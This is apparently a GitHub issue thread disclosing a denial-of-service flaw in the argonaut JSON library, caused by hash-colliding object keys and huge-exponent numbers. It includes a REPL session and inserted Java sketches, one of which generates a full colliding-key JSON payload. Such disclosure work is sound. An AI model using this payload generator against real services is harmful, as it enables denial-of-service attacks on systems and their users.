# Denial of service when parsing JSON object with keys that have the same hash code #314
@plokhotnyuk - I wasn't able to reproduce it in:

```
$ amm
Loading...
Welcome to the Ammonite Repl 1.0.3
(Scala 2.12.4 Java 1.8.0_121)
If you like Ammonite, please support our development at www.patreon.com/lihaoyi
@ import $ivy.`io.argonaut::argonaut:6.2.2`
import $ivy.$

@ import argonaut._, Argonaut._
import argonaut._, Argonaut._

@ case class Foo(num: BigDecimal)
defined class Foo

@ val str = """{ "num" : 1e1000000000}"""
str: String = "{ \"num\" : 1e1000000000}"

@ val json = str.parse
json: Either[String, Json] = Right(JObject(JsonObjectInstance(Map("num" -> JNumber(JsonDecimal("1e1000000000"))), Vector("num"))))

@ val jsonUnsafe = json.right.get
jsonUnsafe: Json = JObject(JsonObjectInstance(Map("num" -> JNumber(JsonDecimal("1e1000000000"))), Vector("num")))

@ DecodeJson.derive[Foo].decodeJson(jsonUnsafe)
res14: DecodeResult[Foo] = DecodeResult(Right(Foo(1E+1000000000)))
```
Could you please tell me how I might modify my example to reproduce the error you raised in this issue?
@kevinmeredith It is a case of collisions in the hash map that is used for the internal representation of a JSON object, like here: Please start from the reproducible steps in the description of the issue, then look into the benchmark code to see how those messages were built, or just add a print statement to see what they look like. But the case you mentioned is also unsafe for users of the parsed message... Just try to pass the parsed value of that big decimal number to the following function and see what happens:
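The function referred to above is not included in this excerpt. As a hedged illustration of why the decoded value is dangerous, the following Java sketch (Java rather than Scala so the JVM-level behavior is explicit; the class and method names are my own, not from the issue) shows that while *parsing* `1e1000000000` into a `BigDecimal` is cheap, any operation that materializes its plain decimal form is not:

```java
import java.math.BigDecimal;

public class BigDecimalBlowup {
    // Parsing "1e1000000000" itself is cheap: BigDecimal stores only
    // the unscaled value (1) plus a 32-bit scale (-1000000000).
    static BigDecimal parsed() {
        return new BigDecimal("1e1000000000");
    }

    public static void main(String[] args) {
        BigDecimal d = parsed();
        // Cheap accessors: no digit expansion happens here.
        System.out.println("precision = " + d.precision()); // 1
        System.out.println("scale     = " + d.scale());     // -1000000000
        // Danger: anything that materializes the plain decimal form,
        // e.g. d.toPlainString(), d.toBigInteger(), or d.setScale(0),
        // must produce ~10^9 digits, burning CPU and gigabytes of memory.
        // (Deliberately not executed here.)
    }
}
```

So a decoder that hands such a `BigDecimal` straight to user code merely defers the denial of service to whichever downstream call first expands the number.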
👋 Hey folks! We've recently opened a bug bounty against this issue, so if you want to get rewarded 💰 for fixing this vulnerability 🕷, head over to https://huntr.dev!
Sub-quadratic decrease in throughput as the number of JSON object fields (with keys that have the same hash code) increases
On contemporary CPUs, parsing such a JSON object (a sequence of 100000 fields like those below, ~1.6 MB in total) can take more than 100 seconds:
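The example fields themselves are not included in this excerpt. As an analogous construction (not necessarily the exact scheme used in the original report, whose payload size differs), a minimal Java sketch can generate arbitrarily many keys that all share one `String.hashCode`, using the classic observation that `"Aa"` and `"BB"` hash to the same value:

```java
import java.util.ArrayList;
import java.util.List;

public class CollidingKeys {
    // "Aa" and "BB" share the same String.hashCode (2112), so any
    // concatenation of n such two-character blocks yields 2^n distinct
    // strings that all collide on one hash code.
    static List<String> collidingKeys(int pairs) {
        List<String> keys = new ArrayList<>();
        keys.add("");
        for (int i = 0; i < pairs; i++) {
            List<String> next = new ArrayList<>(keys.size() * 2);
            for (String k : keys) {
                next.add(k + "Aa");
                next.add(k + "BB");
            }
            keys = next;
        }
        return keys;
    }

    // Builds a JSON object whose keys all have the same hash code,
    // forcing a hash-map-backed parser into worst-case bucket scans.
    static String payload(int fields) {
        int pairs = 1;
        while ((1 << pairs) < fields) pairs++;
        List<String> keys = collidingKeys(pairs);
        StringBuilder sb = new StringBuilder("{");
        for (int i = 0; i < fields; i++) {
            if (i > 0) sb.append(',');
            sb.append('"').append(keys.get(i)).append("\":1");
        }
        return sb.append('}').toString();
    }

    public static void main(String[] args) {
        List<String> keys = collidingKeys(4); // 16 colliding keys
        long distinct = keys.stream().map(String::hashCode).distinct().count();
        System.out.println("keys = " + keys.size() + ", distinct hash codes = " + distinct);
        System.out.println(payload(4));
    }
}
```

Feeding `payload(100000)` to a parser that stores object fields in a hash map exercises exactly the degradation described above: every insertion lands in the same bucket, so insertion cost grows with the number of fields already present.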
Below are the results of the benchmark, where `size` is the number of such fields:

**Reproducible Test Case**
To run the benchmarks on your JDK, install `sbt` (and/or ensure that it is already installed properly), then use the `jsoniter-scala` repo: